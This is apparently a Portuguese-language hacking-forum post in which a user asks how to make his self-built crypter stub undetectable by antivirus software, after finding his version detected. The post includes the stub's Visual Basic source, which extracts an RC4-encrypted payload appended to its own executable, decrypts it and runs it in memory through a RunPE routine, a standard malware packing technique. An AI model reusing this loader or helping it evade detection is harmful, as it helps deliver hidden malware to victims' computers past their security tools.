Boa noite a todos , primeiramente quero agradecer o forum por postar conteudo de primeira e ser a maior rede no assunto na internet.
Bom mas vim aqui pra postar uma duvida,ontem tive lendo alguns topicos e vendo algumas video aulas sobre a criaçao de cripters indetectaveis,bom logo corri a atras para fazer o meu porque ja nao guentava mais pegar cripter de terceiros , bom fiz o meu cliente e minha stub perfeitinha do jeito que eu estava imaginando ,porem na hora de testar me deparei com o seguinte problema.
Como podem ver a stub nao esta assim tao indetectavel ? kkk,parei e pensei po se eu peguei uma source ja disponibilizada na net entao todos os Av's possivelmente tem em seus BDs (se eu estiver enganado me corrijam),bom a minha duvida aqui e a seguinte , como de fato criar uma stub indetectavel ?! sei que essa pergunta e meio estranha ja que pra isso precisa de estudo mas o que eu quero e simplismente isso o caminho pra chegar onde eu quero .
Vou postar a source da stub para possivel entendimento:
Código:Sub Main() Dim Data As String Dim RunPE As New cPEL Dim buffer() As Byte Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1 Data = Input(LOF(1), 1) Close #1 Data = Mid(Data, InStr(Data, "_busTer_") + Len("_busTer_")) Data = RC4.RC4(Data, "busTer") buffer() = StrConv(Data, vbFromUnicode) RunPE.RunPE buffer() End Sub
Bom isso e tudo pessoal ,espero que possam me ajudar mas se nao puderem ja estou aqui agradecendo a todos pela força.
By bl4ckb0t[1]

Responder com Citação